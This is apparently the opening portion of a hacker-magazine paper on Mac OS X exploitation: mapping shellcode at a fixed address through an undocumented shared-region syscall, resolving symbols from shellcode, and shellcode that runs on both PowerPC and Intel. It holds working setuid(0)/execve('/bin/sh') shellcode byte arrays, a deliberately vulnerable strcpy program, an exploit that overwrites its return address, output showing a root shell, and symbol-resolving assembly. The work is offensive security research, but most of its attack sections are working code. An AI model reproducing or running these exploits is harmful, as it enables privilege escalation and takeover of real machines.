+            (____________________________________________________)
+
+
+--[ Contents
+
+  1 - Introduction.
+
+  2 - Local shellcode maneuvering.
+
+  3 - Resolving symbols from Shellcode.
+
+  4 - Architecture spanning shellcode.
+
+  5 - Writing kernel level shellcode.
+   5.1 - Local privilege escalation
+   5.2 - Breaking chroot()
+   5.3 - Advancements
+
+  6 - Misc rootkit techniques.
+
+  7 - Universal binary infection.
+
+  8 - Cracking example - Prey
+
+  9 - Passive malware propagation with mDNS
+
+ 10 - Kernel zone allocator exploitation.
+
+ 11 - Conclusion
+
+ 12 - References
+
+ 13 - Appendix A: Code
+
+
+--[ 1 - Introduction
+
+This paper was written in order to document my research while 
+playing with Mac OS X shellcode.  During this process, however,
+the paper mutated and evolved to cover a selection of Mac OS X 
+related topics which will hopefully make for an interesting read.
+
+Due to the growing popularity of Mac OS X on Intel over PowerPC platforms,
+I have mostly focused on techniques for the former.  Many of the concepts 
+shown are still applicable on PowerPC architecture, but their particular
+implementation is left as an excercise for the reader.
+
+There are already several well written documents on PowerPC and 
+Intel assembly language; I will therefore make no attempt to try
+and teach you these things. 
+
+If you have any suggestions on how to shorten/tighten the code I 
+have written for this paper please drop me an email with the details at: 
+nemo@felinemenace.org.
+
+A tar file containing the full code listings referenced in this paper 
+can be found in Appendix A.
+
+
+--[ 2 - Local shellcode maneuvering.
+
+Over the years there have been many different techniques 
+developed to calculate valid return addresses when 
+exploiting buffer overflows in applications local to 
+your system.  Unfortunately many of these techniques are
+now obsolete on Intel-based Mac OS X systems with the 
+introduction of a non-executable stack in version 10.4
+(Tiger).
+
+In the following subsections I will discuss a few historical 
+approaches for calculating shellcode addresses in memory  
+and introduce a new method for positioning shellcode at a 
+fixed location in the address space of a vulnerable target 
+process.
+
+--[ 2.1 Historical perspective 1: Aleph1
+
+Over the years there have been many different techniques 
+developed to calculate a valid return address when exploiting
+a buffer overflow in an application local to your system. 
+The most widely known of these is shown in aleph1's "Smashing 
+the Stack for Fun and Profit". [9] In this paper, aleph1 simply
+writes a small function get_sp() shown below.
+
+	unsigned long get_sp(void) {
+	   __asm__("movl %esp,%eax");
+	}
+
+This function returns the current stack pointer (esp). 
+aleph1 then simply offsets from this value, in an attempt to hit
+the nop sled before his shellcode on the stack. This method is
+not as precise as it can be, and also requires the shellcode to
+be stored on the stack.  This is an obvious issue if your stack is
+non-executable.
+
+--[ 2.2 Historical perspective 2: Radical Environmentalist
+
+Another method for storing shellcode and calculating the address
+of it inside another process is shown in the Radical 
+Environmentalist paper written by the Netric Security Group [10].
+
+In this paper, the author shows that the execve() syscall allows 
+full control over the stack of the freshly executed process. 
+Because of this, shellcode can be stored in an environment 
+variable, the address of which can be calculated as displacement 
+from the top of the stack.
+
+In older exploits for Mac OS X (prior to 10.4), this technique 
+worked quite well. Since there is no non-executable stack on 
+PowerPC 
+
+--[ 2.3 Beating stack prot :P or whatever
+
+In KF's paper "Non eXecutable Stack Loving on Mac OS X86" [11], 
+the author demonstrates a technique for removing stack protection
+by returning into mprotect() in libSystem (libc) before
+returning into their payload. While this technique is very useful
+for remote exploitation, a more elegant solution to this problem 
+exists for local exploitation.
+
+The first step to getting our shellcode in place is to get some 
+shellcode. There has already been significant published work 
+in this area. If you are interested to learn how to write 
+shellcode for Mac OS X for use in local privilege escalation 
+exploits, a couple of papers you should definitely check out are
+shown in the references section. [1] and [8]. The shellcode 
+chosen for the sample code is described in full in section 2 
+of this paper.
+
+The method which I now propose relies on an undocumented the
+undocumented Mac OS X system call "shared_region_mapping_np".
+This syscall is used at runtime by the dynamic loader (dyld) 
+to map widely used libraries across the address space of every 
+process on the system; this functionality has many evil uses. 
+
+The file /usr/include/sys/syscalls.h contains the syscall 
+number for each of the syscalls. Here is the appropriate 
+line in that file which contains our syscall.
+
+	#define SYS_shared_region_map_file_np 299
+
+Here is the prototype for this syscall:
+
+	struct shared_region_map_file_np(
+		int fd,
+		uint32_t mappingCount,
+		user_addr_t mappings, 
+		user_addr_t slide_p 
+	);
+
+The arguments to this syscall are very simple:
+
+fd             an open file descriptor, providing access to data that 
+               we want loaded in memory.
+mappingCount   the number of mappings which we want to make from the 
+               file.
+mappings       a pointer to an array of _shared_region_mapping_np
+               structs which describe each mapping (see below).
+slide_p        determines whether the syscall is allowed to slide
+               the mapping around inside the shared region of memory
+	       to make it fit.
+
+Here is the struct definition for the elements of the third argument:
+
+	struct _shared_region_mapping_np {
+		mach_vm_address_t   	address;
+		mach_vm_size_t      	size;
+		mach_vm_offset_t    	file_offset;
+		vm_prot_t               max_prot;  
+		vm_prot_t               init_prot; 
+	};
+
+The struct elements shown above can be explained as followed:
+
+address        the address in the shared region where the data should
+               be stored.
+size           the size of the mapping (in bytes)
+file_offset    the offset into the file descriptor to which we must
+               seek in order to reach the start of our data.
+max_prot       This is the maximum protection of the mapping,
+               this value is created by or'ing the #defines:
+	       VM_PROT_EXECUTE,VM_PROT_READ,VM_PROT_WRITE and VM_COW.
+init_prot      This is the initial protection of the mapping, again
+               this is created by or'ing the values mentioned above.
+
+The following #define's describe the shared region in which
+we can map our data. They show the various regions within the
+0x00000000->0xffffffff address space which are available to
+use as shared regions. These are shown as defined as starting
+point, followed by size.
+
+#define SHARED_LIBRARY_SERVER_SUPPORTED
+#define GLOBAL_SHARED_TEXT_SEGMENT      0x90000000
+#define GLOBAL_SHARED_DATA_SEGMENT      0xA0000000
+#define GLOBAL_SHARED_SEGMENT_MASK      0xF0000000
+
+#define SHARED_TEXT_REGION_SIZE         0x10000000
+#define SHARED_DATA_REGION_SIZE         0x10000000
+#define SHARED_ALTERNATE_LOAD_BASE      0x09000000
+
+To reduce the chance that our shellcode offset will be 
+stored at an address that does not contain a NULL byte 
+(thereby making this technique viable for string based 
+overflows), we position the shellcode at the last address in 
+the region where a page (0x1000 bytes) can be mapped.  By 
+doing so, our shellcode will be stored at the address 
+0x9ffffxxx.
+
+The following code can be used to map some shellcode into
+a fixed location by opening the file "/tmp/mapme" and writing 
+our shellcode out to it. It then uses the file descriptor
+to call the "shared_region_map_file_np" which maps the
+code, as well as a bunch of int3's (cc), into the shared
+region.
+
+/*--------------------------------------------------------
+ * [ sharedcode.c ] 
+ *
+ * by nemo@felinemenace.org 2007
+ */ 
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <mach/vm_prot.h>
+#include <mach/i386/vm_types.h>
+#include <mach/shared_memory_server.h>
+#include <string.h>
+#include <unistd.h>
+
+#define BASE_ADDR 0x9ffff000
+#define PAGESIZE  0x1000
+#define FILENAME  "/tmp/mapme"
+
+char dual_sc[] =
+"\x5f\x90\xeb\x60"
+
+// setuid() seteuid()
+"\x38\x00\x00\xb7\x38\x60\x00\x00"
+"\x44\x00\x00\x02\x38\x00\x00\x17"
+"\x38\x60\x00\x00\x44\x00\x00\x02"
+
+// ppc execve() code by b-r00t
+"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
+"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
+"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
+"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
+"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
+"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
+"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
+"\x38\x0a\xfe\x91\x44\xff\xff\x02"
+"\x2f\x62\x69\x6e\x2f\x73\x68\x58"
+
+// seteuid(0);
+"\x31\xc0\x50\xb0\xb7\x6a\x7f\xcd"
+"\x80"
+// setuid(0);
+"\x31\xc0\x50\xb0\x17\x6a\x7f\xcd"
+"\x80"
+// x86 execve() code / nemo
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
+"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
+"\x54\x54\x53\x53\xb0\x3b\xcd\x80";
+
+
+struct _shared_region_mapping_np {
+	mach_vm_address_t   	address;
+	mach_vm_size_t      	size;
+	mach_vm_offset_t    	file_offset;
+	vm_prot_t               max_prot;   /* read/write/execute/COW/ZF */
+	vm_prot_t               init_prot;  /* read/write/execute/COW/ZF */
+};
+
+int main(int argc,char **argv)
+{
+	int fd;
+	struct _shared_region_mapping_np sr;
+	chr data[PAGESIZE] = { 0xcc };
+	char *ptr = data + PAGESIZE - sizeof(dual_sc);
+	
+	sr.address     = BASE_ADDR;
+	sr.size        = PAGESIZE;
+	sr.file_offset = 0;
+	sr.max_prot    = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE;
+	sr.init_prot   = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; 
+
+	if((fd=open(FILENAME,O_RDWR|O_CREAT))==-1)
+	{
+		perror("open");
+		exit(EXIT_FAILURE);
+	}
+
+	memcpy(ptr,dual_sc,sizeof(dual_sc));
+
+	if(write(fd,data,PAGESIZE) != PAGESIZE)
+	{
+		perror("write");
+		exit(EXIT_FAILURE);
+	}
+
+	if(syscall(SYS_shared_region_map_file_np,fd,1,&sr,NULL)==-1)
+	{
+		perror("shared_region_map_file_np");
+		exit(EXIT_FAILURE);
+	}
+
+	close(fd);
+	unlink(FILENAME);
+
+	printf("[+] shellcode at: 0x%x.\n",sr.address + 
+					   PAGESIZE - 
+					   sizeof(dual_sc));
+
+	exit(EXIT_SUCCESS);
+}
+
+/*---------------------------------------------------------*/
+
+When we compile and execute this code, it prints the address of
+the shellcode in memory. You can see this below.
+
+	-[nemo@fry:~/code]$ gcc sharedcode.c -o sharedcode
+	-[nemo@fry:~/code]$ ./sharedcode 
+	[+] shellcode at: 0x9fffff71.
+
+As you can see the address used for our shellcode is 0x9fffff71.
+This address, as expected, is free of NULL bytes.
+
+You can test that this procedure has worked as expected by 
+starting a new process and connecting to it with gdb.
+
+By jumping to this address using the "jump" command in gdb
+our shellcode is executed and a bash prompt is displayed.
+
+	-[nemo@fry:~/code]$ gdb /usr/bin/id
+	GNU gdb 6.3.50-20050815 (Apple version gdb-563) 
+	(gdb) r
+	Starting program: /usr/bin/id 
+	^C[Switching to process 752 local thread 0xf03]
+	0x8fe01010 in __dyld__dyld_start ()
+	Quit
+	(gdb) jump *0x9fffff71
+	Continuing at 0x9fffff71.
+	(gdb) c
+	Continuing.
+	-[nemo@fry:Users/nemo/code]$  
+
+In order to demonstrate how this can be used in an exploit, 
+I have created a trivially exploitable program:
+
+	/*
+	 * exploitme.c
+
+	 */ 
+	int main(int ac, char  **av)
+	{
+		char buf[50] = { 0 };
+		printf("%s",av[1]);
+
+		if(ac == 2)
+			strcpy(buf,av[1]);
+
+		return 1;
+	}
+
+Below is the exploit for the above program. 
+
+	/*
+	 * [ exp.c ]
+	 * nemo@felinemeance.org 2007
+	 */
+
+	#include <stdio.h>
+	#include <stdlib.h>
+
+	#define VULNPROG "./exploitme"
+	#define OFFSET 66  
+	#define FIXEDADDR 0x9fffff71
+
+	int main(int ac, char **av)
+	{
+		char evilbuff[OFFSET];
+		char *args[] = {VULNPROG,evilbuff,NULL};
+		char *env[]  = {"TERM=xterm",NULL};
+		long *ptr = (long *)&(evilbuff[OFFSET - 4]);
+		memset(evilbuff,'A',OFFSET);
+		*ptr = FIXEDADDR;
+
+		execve(*args,args,env);
+		return 1;
+	}
+
+As you can see we fill the buffer up with "A"'s, followed by our
+return address calculated by sharedcode.c. After the strcpy() occurs 
+our stored return address on the stack is overwritten with our new 
+return address (0x9fffff71) and our shellcode is executed.
+
+If we chown root /exploitme; chmod +s /exploitme; we can see
+that our shellcode is mapped into suid processes, which makes
+this technique feasible for local privilege escalation. Also, 
+because we control the memory protection on our mapping, we bypass 
+non-executable stack protection.
+
+	-[nemo@fry:/]$ ./exp
+	fry:/ root# id
+	uid=0(root)
+
+One limitation of this technique is that the file you are 
+mapping into the shared region must exist on the root file-
+system. This is clearly explained in the comment below.
+
+/*
+ * The split library is not on the root filesystem.  We don't
+ * want to pollute the system-wide ("default") shared region
+ * with it.
+ * Reject the mapping.  The caller (dyld) should "privatize"
+ * (via shared_region_make_private()) the shared region and
+ * try to establish the mapping privately for this process.
+ */
+]
+
+Another limitation to this technique is that Apple have locked 
+down this syscall with the following lines of code:
+
+	 *
+	 * This system call is for "dyld" only.
+	 *
+
+Luckily we can beat this magnificent protection by....
+completely ignoring it.
+
+
+--[ 3 - Resolving Symbols From Shellcode
+
+In this section I will demonstrate a method which can be used to 
+resolve the address of a symbol from shellcode.
+
+This is useful in remote exploitation where you wish to access 
+or modify some of the functionality of the vulnerable program. 
+This may also be useful in calling some of the functions in a 
+particular shared library in the address space.
+
+The examples in this section are written in Intel assembly, nasm 
+syntax. The concepts presented can easily be recreated in 
+PowerPC assembler. If anyone takes the time to do this let me 
+know.
+
+The method I will describe requires some basic knowledge about
+the Mach-O object format and how symbols are stored/resolved. 
+I will try to be as verbose as I can, however if more research 
+is required check out the Mach-O Runtime document from the 
+Apple website. [4]
+
+The process of resolving symbols which I am describing in this
+section involves locating the LINKEDIT section in memory.
+
+The LINKEDIT section is broken up into a symbol table (symtab)
+and string table (strtab) as follows:
+
+      [ LINKEDIT SECTION ]
+
+low memory: 0x0
+.________________________________,
+|---(symtab data starts here.)---| 
+|<nlist struct>                  |
+|<nlist struct>                  |
+|<nlist struct>                  |
+| ...                            |
+|---(strtab data starts here.)---|
+|"_mh_execute_header\0"          |
+|"dyld_start\0"                  |
+|"main"                          |
+| ...                            |
+:________________________________;
+himem : 0xffffffff
+
+By locating the start of the string table and the start of the
+symbol table relative to the address of the LINKEDIT section
+it is then possible to loop through each of the nlist structures
+in the symbol table and access their appropriate string in
+the string table. I will now run through this technique in fine
+detail.
+
+To resolve symbols we will start by locating the mach_header in 
+memory. This will be the start of our mapped in mach-o image.
+One way to find this is to run the "nm" command on our binary
+and locate the address of the __mh_execute_header symbol.
+
+Currently on Mac OS X, the executable is simply mapped in at 
+the start of the first page. 0x1000. 
+
+We can verify this as follows:
+
+	-[nemo@fry:~]$ nm /bin/sh | grep mh_
+	00001000 A __mh_execute_header
+
+	(gdb) x/x 0x1000
+	0x1000: 0xfeedface
+
+As you can see the magic number (0xfeedface) is at 0x1000.
+This is our Mach-O header. The struct for this is shown 
+below:
+
+	struct mach_header 
+	{ 
+	    uint32_t magic; 
+	    cpu_type_t cputype; 
+	    cpu_subtype_t cpusubtype; 
+	    uint32_t filetype; 
+	    uint32_t ncmds; 
+	    uint32_t sizeofcmds; 
+	    uint32_t flags; 
+	}; 
+
+In my shellcode I assume that the file we are parsing always
+has a LINKEDIT section and a symbol table load command 
+(LC_SYMTAB).  This means that I do not bother parsing the
+mach_header struct. However if you do not wish to make this 
+assumption, it is easy enough to loop ncmds number of times 
+while parsing the load commands.
+
+Directly after the mach_header struct in memory are a bunch
+of load_commands. Each of these commands begins with a "cmd"
+id field, and the size of the command.
+
+Therefore, we start our code by setting ecx to the address of 
+the first load command, directly after the mach_header struct 
+in memory. This positions us at 0x101c. We then null out some 
+of the registers to use later in the code. 
+
+	;# null out some stuff (ebx,edx,eax)
+        xor     ebx,ebx
+	mul     ebx                            
+
+	;# position ecx past the mach_header.
+	xor	ecx,ecx
+        mov     word cx,0x101c              
+
+For symbol resolution, we are only interested in LC_SEGMENT 
+commands and the LC_SYMTAB. In particular we are looking for
+the LINKEDIT LC_SEGMENT struct. This is explained in more 
+detail later.
+
+The #define's for these are in /usr/include/mach-o/loader.h
+as follows:
+
+	#define LC_SEGMENT      0x1     
+		/* segment of this file to be mapped */
+	#define LC_SYMTAB       0x2     
+		/* link-edit stab symbol table info */
+
+The LC_SYMTAB command uses the following struct:
+
+	struct symtab_command 
+	{ 
+	    uint_32 cmd; 
+	    uint_32 cmdsize; 
+	    uint_32 symoff; 
+	    uint_32 nsyms; 
+	    uint_32 stroff; 
+	    uint_32 strsize; 
+	}; 
+
+
+
+The symoff field holds the offset from the start of the file to 
+the symbol table. The stroff field holds the offset to the string 
+table. Both the symbol table and string table are contained in 
+the LINKEDIT section.  
+
+By subtracting the symoff from the stroff we get the offset into 
+the LINKEDIT section in which to read our strings. The nsyms 
+field can be used as a loop count when enumerating the symtab. 
+For the sake of this sample code, however,i have assumed that 
+the symbol exists and ignored the nsyms field entirely. 
+
+We find the LC_SYMTAB command simply by looping through and 
+checking the "cmd" field for 0x2.
+
+The LINKEDIT section is slightly harder to find; we need to look 
+for a load command with the cmd type 0x1 (segment_command), 
+then check for the name "__LINKEDIT" in the segname field of
+the struct. The segment_command struct is shown below:
+
+	struct segment_command 
+	{ 
+	    uint32_t cmd; 
+	    uint32_t cmdsize; 
+	    char segname[16]; 
+	    uint32_t vmaddr; 
+	    uint32_t vmsize; 
+	    uint32_t fileoff; 
+	    uint32_t filesize; 
+	    vm_prot_t maxprot; 
+	    vm_prot_t initprot; 
+	    uint32_t nsects; 
+	    uint32_t flags; 
+	}; 
+
+I will now run through an explanation of the assembly code 
+used to accomplish this technique.
+
+I have used a trivial state machine to loop through each 
+load_command until both the symbol table and LINKEDIT virtual 
+addresses have been found. 
+
+First we check which type of load_command each is and then we 
+jump to the appropriate handler, if it is one of the types we 
+need.
+
+next_header:
+	cmp     byte [ecx],0x2  ;# test for LC_SYMTAB (0x2)
+	je      found_lcsymtab
+
+	cmp     byte [ecx],0x1  ;# test for LC_SEGMENT (0x1)
+	je      found_lcsegment
+
+The next two instructions add the length field of the 
+load_command to our pointer. This positions us over the cmd 
+field of the next load_command in memory. We jump back up
+to the next_header symbol and compare again.
+
+next:   
+	add     ecx,[ecx + 0x4]   ;# ecx += length 
+	jmp     next_header
+
+
+The found_lcsymtab handler is called when we have a cmd == 0x2.
+We make the assumption that there's only one LC_SYMTAB. We can 
+use the fact that if we're here, eax hasn't been set yet and is 0.
+By comparing this with edx we can see if the LINKEDIT segment has 
+been found. After the cmp, we update eax with the address of the 
+LC_SYMTAB. If both the LINKEDIT and LC_SYMTAB sections have been 
+found, we jmp to the "found_both" symbol, otherwise we process
+the next header.
+        
+found_lcsymtab:
+	cmp     eax,edx    ;# use the fact that eax is 0 to test edx.
+	mov     eax,ecx    ;# update eax with current pointer.
+	jne     found_both ;# we have found LINKEDIT and LC_SYMTAB
+	jmp     next       ;# keep looking for LINKEDIT
+
+The found_lcsegment handler is very similar to the 
+found_lcsymtab code. However, since there are many LC_SEGMENT 
+commands in most files we need to be sure that we've found 
+the __LINKEDIT section.
+
+To do this we add 8 to the struct pointer to get to the 
+segname[] string. We then check 2 characters in, skipping
+the "__" for the 4 bytes "LINK". 0x4b4e494c accounting for
+endian issues. Again, we use the fact that there should 
+only be one LINKEDIT section. This means that if we are
+past the check for "LINK" edx is 0. We use this to test
+eax, to see if the LC_SYMTAB command has been found.
+Again if we are done we jmp to found_both, if not back 
+up to the "next_header" symbol.
+
+found_lcsegment:
+	lea     esi,[ecx + 0x8] ;# get pointer to name
+	;# test for "LINK"
+	cmp     long [esi + 0x2],0x4b4e494c     
+	jne     next            ;# it's not LINKEDIT, NEXT!
+	cmp     edx,eax         ;# use zero'ed edx to test eax
+	mov     edx,ecx         ;# set edx to current address
+	jne     found_both      ;# we're done!
+	jmp     next            ;# still need to find 
+				;# LC_SYMTAB, continue
+				;# EDX = LINKEDIT struct
+				;# EAX = LC_SYMTAB struct
+
+Now that we have our pointers to LINKEDIT and LC_SYMTAB, we can 
+subtract symtab_command.symoff from symtab_command.stroff to 
+obtain the offset of the strings table from the start of LINKEDIT.
+By adding this offset to LINKEDIT's virtual address, we have now
+calculated the virtual address of the string table in memory.
+
+found_both:
+        mov     edi,[eax + 0x10]       ;# EDI = stroff
+        sub     edi,[eax + 0x8]        ;# EDI -= symoff
+        mov     esi,[edx + 0x18]       ;# esi = VA of linkedit
+        add     edi,esi       ;# add virtual address of LINKEDIT to offset
+
+The LINKEDIT section contains a list of "struct nlist" structures.
+Each one corresponds to a symbol. The first union contains an offset
+into the string table (which we have the VA for). In order to find the 
+symbol we want we simply cycle through the array and offset our
+string table pointer to test the string.
+
+	struct nlist 
+	{ 
+	    union { 
+	    #ifndef __LP64__ 
+		char *n_name; 
+	    #endif 
+		int32_t n_strx; 
+	    } n_un; 
+	    uint8_t n_type; 
+	    uint8_t n_sect; 
+	    int16_t n_desc; 
+	    uint32_t n_value; 
+	}; 
+]
+
+Now that we are able to walk through our nlist structs we are good
+to go. However it wouldn't make sense to store the full symbol 
+name in our shellcode as this would make the code larger than it 
+already is. ;/
+
+I have chosen to steal^H^H^H^Huse skape's "compute_hash" function
+from "Understanding Windows Shellcode" [5]. He explains how the 
+code works in his paper.
+
+The following code shows a simple loop. First we jump down to the
+"hashes" symbol, and call back up to get a pointer to our list of
+hashes. We read the first hash in, and then loop through each of
+the nlist structures, hashing the symbol found and comparing it
+against our precomputed hash.
+
+If the hash is unsuccessful we jump back up to "check_next_hash",
+however if it's successful we continue down to the "done" symbol.
+
+;# esi == constant pointer to nlist
+;# edi == strtab base
+
+lookup_symbol:
+        jmp     hashes
+lookup_symbol_up:
+        pop     ecx
+        mov     ecx,[ecx]           ;# ecx = first hash     
+check_next_hash:
+        push    esi                 ;# save nlist pointer
+        push    edi                 ;# save VA of strtable
+        mov     esi,[esi]           ;# *esi = offset from strtab to string
+        add     esi,edi             ;# add VA of strtab
+compute_hash:
+        xor edi, edi
+        xor eax, eax
+        cld
+compute_hash_again:
+        lodsb
+        test al, al                 ;# test if on the last byte.
+        jz compute_hash_finished
+        ror edi, 0xd
+        add edi, eax
+        jmp compute_hash_again
+compute_hash_finished:
+        cmp     edi,ecx
+        pop     edi
+        pop     esi
+        je      done
+        lea     esi,[esi + 0xc]     ;# Add sizeof(struct nlist)
+        jmp     check_next_hash
+done:   
+
+Each hash we wish to resolve can be appended after the hashes: symbol.
+
+                                                ;# hash in edi
+hashes: 
+        call    lookup_symbol_up
+        dd	0x8bd2d84d
+
+Now that we have the address of our symbol we're all done and can 
+call our function, or modify it as we need.
+
+In order to calculate the hash for our required symbol, I have cut
+and paste some of skapes code into a little c progam as follows:
+
+	#include <stdio.h>
+	#include <stdlib.h>
+
+	char chsc[] = 
+	"\x89\xe5\x51\x60\x8b\x75\x04\x31"
+	"\xff\x31\xc0\xfc\xac\x84\xc0\x74"
+	"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4"
+	"\x89\x7d\xfc\x61\x58\x89\xec\xc3";
+
+	int main(int ac, char **av)
+	{
+		long (*hashstr)() = (long (*)())chsc;
+
+		if(ac != 2) {
+			fprintf(stderr,"[!] usage: %s <string to hash>\n",*av);
+			exit(1);
+		}
+
+		printf("[+] Hash: 0x%x\n",hashstr(av[1]));
+
+		return 0;
+	}
+
+We can run this as shown below to generate our hash:
+
+-[nemo@fry:~/code/kernelsc]$ ./comphash _do_payload
+[+] Hash: 0x8bd2d84d
+
+If the symbol we have resolved is a function that we wish to call
+there is a little more we must do before this is possible.
+
+Mac OS X's linker, by default, uses lazy binding for external 
+symbols. This means that if our intended function calls another
+function in an external library, which hasn't been called elsewhere
+in the program already, the dynamic linker will try to resolve
+the address as you call it.
+
+For example, a call to execve() with lazy binding will be replaced
+with a call to dyld_stub_execve() as shown below:
+
+0x1f54 <do_payload+78>: call   0x301b <dyld_stub_execve>
+
+At runtime this function contains one instruction:
+
+call   0x8fe12f70 <__dyld_fast_stub_binding_helper_interface>
+
+This invokes the dyld which resolves the symbol and replaces this
+instruction with a jmp to the real code:
+
+jmp    0x9003b7d0 <execve>
+
+The only problem which this causes is that this function requires
+the stack pointer to be correctly aligned, otherwise our code will
+crash.
+
+To do this we simply subtract 0xc from our stack pointer before
+calling our function.
+
+Note: 
+	This will not be necessary if the program you are 
+	exploiting has been compiled with the -bind_at_load 
+	flag.
+
+Here is the code I have used to make the call.
+
+done:   
+        mov     eax,[esi + 0x8] ;# eax == value
+        xchg esp,edx            ;# annoyingly large
+        sub dl,0xc              ;# way to align the stack pointer
+        xchg esp,edx            ;# without null bytes.
+        call    eax
+        xchg esp,edx            ;# annoyingly large
+        add dl,0xc              ;# way to fix up the stack pointer
+        xchg esp,edx            ;# without null bytes.
+        ret
+
+I have written a small sample c program to demonstrate this code
+in action.
+
+The following code has no call to do_payload(). The shellcode will
+resolve the address of this function and call it.
+
+#include <stdio.h>
+#include <stdlib.h>
+
+char symresolve[] =
+"\x31\xdb\xf7\xe3\x31\xc9\x66\xb9\x1c\x10\x80\x39\x02\x74\x0a\x80"
+"\x39\x01\x74\x0d\x03\x49\x04\xeb\xf1\x39\xd0\x89\xc8\x75\x16\xeb"
+"\xf3\x8d\x71\x08\x81\x7e\x02\x4c\x49\x4e\x4b\x75\xe7\x39\xc2\x89"
+"\xca\x75\x02\xeb\xdf\x8b\x78\x10\x2b\x78\x08\x8b\x72\x18\x01\xf7"
+"\xeb\x39\x59\x8b\x09\x56\x57\x8b\x36\x01\xfe\x31\xff\x31\xc0\xfc"
+"\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x39\xcf\x5f\x5e"
+"\x74\x05\x8d\x76\x0c\xeb\xde\x8b\x46\x08\x87\xe2\x80\xea\x0c\x87"
+"\xe2\xff\xd0\x87\xe2\x80\xc2\x0c\x87\xe2\xc3\xe8\xc2\xff\xff\xff"
+"\x4d\xd8\xd2\x8b"; // HASH
+
+void do_payload()
+{
+        char *args[] = {"/usr/bin/id",NULL};
+        char *env[]  = {"TERM=xterm",NULL};
+        printf("[+] Executing id.\n");
+        execve(*args,args,env);
+}
+
+int main(int ac, char **av)
+{
+        void (*fp)() = (void (*)())symresolve;
+        fp();
+        return 0;
+}
+
+
+As you can see below this code works as you'd expect.
+
+-[nemo@fry:~]$ ./testsymbols 
+[+] Executing id.
+uid=501(nemo) gid=501(nemo) groups=501(nemo)
+
+The full assembly listing for the method shown in this section
+is shown in the Appendix for this paper.
+
+I originally worked on this method for resolving kernel symbols.
+
+Unfortunately, the kernel jettisons (free()'s) the LINKEDIT section
+after it boots. Before doing this, it writes out the mach-o file 
+/mach.sym containing the symbol information for the kernel.
+
+If you set the boot flag "keepsyms" the LINKEDIT section will 
+not be free()'ed and the symbols will remain in kernel memory.
+
+In this case we can use the code shown in this section, and 
+simply scan memory starting from the address 0x1000 until we 
+find 0xfeedface. Here is some assembly code to do this:
+
+SECTION .text
+_main:
+        xor     eax,eax
+        inc     eax
+        shl     eax,0xc         ;# eax = 0x1000
+        mov     ebx,0xfeedface  ;# ebx = 0xfeedface
+up:
+        inc     eax
+        inc     eax
+        inc     eax
+        inc     eax             ;# eax += 4
+        cmp     ebx,[eax]       ;# if(*eax != ebx) {
+        jnz     up              ;#      goto up }
+        ret
+
+After this is done we can resolve kernel symbols as needed.
+
+--[ 4 - Architecture Spanning Shellcode
+
+Since the move from PowerPC to Intel architecture it has become 
+common to find both PowerPC and Intel Macs running Mac OS X in
+the wild. On top of this, Mac OS X 10.4 ships with virtualization
+technology from Transitive called Rosetta which allows an Intel Mac 
+toexecute a PowerPC binary.  This means that even after you've 
+finger-printed the architecture of a machine as Intel, there's a 
+chance a network facing daemon might be running PowerPC code. This 
+poses a challenge when writing remote exploits as it is harder 
+incorrectly fingerprinting the architecture of the machine will 
+result in failure.
+
+In order to remedy this a technique can be used to create 
+shellcode which executes on both Intel and PowerPC architecture.
+
+This technique has been documented in the Phrack article of the same
+name as this section [16]. 
+I provide a brief explanation here as this technique is used 
+throughout the remainder of the paper.
+
+The basic premise of this technique is to find a PowerPC instruction
+which, when executed, will simply step forward one instruction. It
+must do this without performing any memory access, only changing the
+state of the registers. When this instruction is interpreted as Intel
+opcodes however, a jump must be performed. This jump must be over the
+PowerPC portion of the code and into the Intel instructions. In this 
+way the architecture type can be determined.
+
+A suitable PowerPC instruction exists. This is the "rlwnm"
+instruction.
+
+The following is the definition of this instruction, taken from the
+PowerPC manual:
+
+(rlwnm) Rotate Left Word then AND with Mask (x'5c00 0000')
+
+rlwnm  	rA,rS,rB,MB,ME	(Rc = 0) 
+rlwnm. 	rA,rS,rB,MB,ME	(Rc = 1) 
+
+,__________________________________________________________.
+|10101 |   S    |     A    |    B    |   MB    |   ME    |Rc|
+'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+0     5 6     10 11      15 16     20 21     25 26       30 31
+
+This is the rotate left instruction on PowerPC. Basically a mask,
+(defined by the bits MB to ME) is applied and the register rS is
+rotated rB bits. The result is stored in rA. No memory access is
+made by this instruction regardless of the arguments given.
+
+By using the following parameters for this instruction we can
+end up with a valid and useful opcode.
+
+	rA = 16
+	rS = 28
+	rB = 29
+	MB = XX
+	ME = XX
+	
+	rlwnm r16,r28,r29,XX,XX
+
+This leaves us with the opcode:
+
+	"\x5f\x90\xeb\xxx" 
+
+When this is broken down as Intel code it becomes the following 
+instructions:
+
+nasm > db 0x5f,0x90,0xeb,0xXX
+00000000  5F                pop edi	    // move edi to the stack
+00000001  90                nop		    // do nothing.
+00000002  EBXX              jmp short 0xXX  // jump to our payload.
+
+Here is a small example of how this can be useful.
+
+	char trap[] =
+	"\x5f\x90\xeb\x06"	// magic arch selector
+	"\x7f\xe0\x00\x08"	// trap ppc instruction
+	"\xcc\xcc\xcc\xcc";	// intel: int3 int3 int3 int3
+
+This shellcode when executed on PowerPC architecture will 
+execute the "trap" instruction directly below our selector code.
+However when this is interpreted as Intel architecture instructions
+the "eb 06" causes a short jump to the int3 instructions. The 
+reason 06 rather than 04 is used for our jmp short value here is that
+eip is pointing to the start of the jmp instruction itself (eb) 
+during execution.  Therefore, the jmp instruction needs to compensate
+by adding two bytes to the lenth of the PowerPC assembly.
+
+To verify that this multi-arch technique works, here is the output 
+of gdb when attached to this process on Intel architecture:
+
+	Program received signal SIGTRAP, Trace/breakpoint trap.
+	0x0000201b in trap ()
+	(gdb) x/i $pc
+	0x201b <trap+11>:       int3  
+
